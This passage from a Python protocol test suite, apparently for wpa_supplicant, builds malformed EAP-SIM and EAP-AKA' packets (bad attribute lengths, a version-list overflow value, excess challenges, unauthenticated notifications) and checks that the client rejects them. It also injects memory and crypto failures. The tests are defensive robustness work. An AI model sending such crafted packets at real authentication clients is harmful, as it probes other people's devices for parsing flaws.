EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0,
0xf4a3c1d3, 0x7c901401, 0x34bd8b01, 0x6f7fa32f,
EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
EAP_SIM_AT_AUTN, 5, 0, 0xffffffff, 0xffffffff,
0xd1f90322, 0x40514cb4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_KDF_INPUT length")
dev[0].note("Invalid AT_KDF_INPUT length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF_INPUT, 2, 0xffff, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_KDF length")
dev[0].note("Invalid AT_KDF length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with large number of KDF proposals")
dev[0].note("Challenge with large number of KDF proposals")
return struct.pack(">BBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 12 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 253,
EAP_SIM_AT_KDF, 1, 252,
EAP_SIM_AT_KDF, 1, 251,
EAP_SIM_AT_KDF, 1, 250,
EAP_SIM_AT_KDF, 1, 249,
EAP_SIM_AT_KDF, 1, 248,
EAP_SIM_AT_KDF, 1, 247,
EAP_SIM_AT_KDF, 1, 246,
EAP_SIM_AT_KDF, 1, 245,
EAP_SIM_AT_KDF, 1, 244)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
dev[0].note("Challenge with multiple KDF proposals (preparation)")
return struct.pack(">BBHBBHBBHBBBBBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 2 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 2,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with an extra KDF appended")
dev[0].note("Challenge with an extra KDF appended")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 2,
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
dev[0].note("Challenge with multiple KDF proposals (preparation)")
return struct.pack(">BBHBBHBBHBBBBBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 2 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 2,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with a modified KDF")
dev[0].note("Challenge with a modified KDF")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 0,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(aka_prime_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 18):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 0 ]:
time.sleep(0.1)
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_sim(dev, apdev):
"""EAP-SIM protocol tests"""
def sim_handler(ctx, req):
logger.info("sim_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_SIM)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_AUTN")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_AUTN, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short AT_VERSION_LIST")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AT_VERSION_LIST overflow")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 1, 0xffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_AUTS")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_AUTS, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_CHECKCODE")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_CHECKCODE, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No AT_VERSION_LIST in Start")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No support version in AT_VERSION_LIST")
return struct.pack(">BBHBBHBBH4B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 3, 2, 3, 4, 5)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request without ID type")
return struct.pack(">BBHBBHBBH2H", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID (duplicate)")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID (duplicate)")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID (duplicate)")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No AT_MAC and AT_RAND in Challenge")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No AT_RAND in Challenge")
return struct.pack(">BBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Insufficient number of challenges in Challenge")
return struct.pack(">BBHBBHBBH4LBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 20 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_RAND, 5, 0, 0, 0, 0, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too many challenges in Challenge")
return struct.pack(">BBHBBHBBH4L4L4L4LBBH4L", EAP_CODE_REQUEST,
ctx['id'],
4 + 1 + 3 + 4 + 4 * 16 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_RAND, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Same RAND multiple times in Challenge")
return struct.pack(">BBHBBHBBH4L4L4LBBH4L", EAP_CODE_REQUEST,
ctx['id'],
4 + 1 + 3 + 4 + 3 * 16 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_RAND, 13, 0, 0, 0, 0, 0, 0, 0, 0, 1,
0, 0, 0, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but no MAC")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but invalid MAC value")
return struct.pack(">BBHBBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16384)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16385)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with unrecognized non-failure")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Re-authentication (unexpected) with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_REAUTHENTICATION,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Client Error")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CLIENT_ERROR, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown subtype")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, 255, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(sim_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 25):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 0 ]:
time.sleep(0.1)
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_sim_errors(dev, apdev):
"""EAP-SIM protocol tests (error paths)"""
check_hlr_auc_gw_support()
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
with alloc_fail(dev[0], 1, "eap_sim_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "os_get_random;eap_sim_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
with fail_test(dev[0], 1, "aes_128_cbc_encrypt;eap_sim_response_reauth"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
with fail_test(dev[0], 1, "os_get_random;eap_sim_msg_add_encr_start"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
with fail_test(dev[0], 1, "os_get_random;eap_sim_init_for_reauth"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
with alloc_fail(dev[0], 1, "eap_sim_parse_encr;eap_sim_process_reauthentication"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ (1, "eap_sim_verify_mac;eap_sim_process_challenge"),
(1, "eap_sim_parse_encr;eap_sim_process_challenge"),
(1, "eap_sim_msg_init;eap_sim_response_start"),
(1, "wpabuf_alloc;eap_sim_msg_init;eap_sim_response_start"),
(1, "=eap_sim_learn_ids"),
(2, "=eap_sim_learn_ids"),
(2, "eap_sim_learn_ids"),
(3, "eap_sim_learn_ids"),
(1, "eap_sim_process_start"),
(1, "eap_sim_getKey"),
(1, "eap_sim_get_emsk"),
(1, "eap_sim_get_session_id") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000@domain",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ (1, "aes_128_cbc_decrypt;eap_sim_parse_encr") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
params = int_eap_server_params()
params['eap_sim_db'] = "unix:/tmp/hlr_auc_gw.sock"
params['eap_sim_aka_result_ind'] = "1"
hostapd.add_ap(apdev[1], params)
with alloc_fail(dev[0], 1,
"eap_sim_msg_init;eap_sim_response_notification"):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
scan_freq="2412",
eap="SIM", identity="1232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ "eap_sim_msg_add_encr_start;eap_sim_response_notification",
"aes_128_cbc_encrypt;eap_sim_response_notification" ]
for func in tests:
with fail_test(dev[0], 1, func):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
scan_freq="2412",
eap="SIM", identity="1232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
dev[0].request("REAUTHENTICATE")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("EAP method not started on reauthentication")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ "eap_sim_parse_encr;eap_sim_process_notification_reauth" ]
for func in tests:
with alloc_fail(dev[0], 1, func):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
scan_freq="2412",
eap="SIM", identity="1232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
dev[0].request("REAUTHENTICATE")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("EAP method not started on reauthentication")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
def test_eap_proto_aka_errors(dev, apdev):
"""EAP-AKA protocol tests (error paths)"""
check_hlr_auc_gw_support()
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
with alloc_fail(dev[0], 1, "eap_aka_init"):
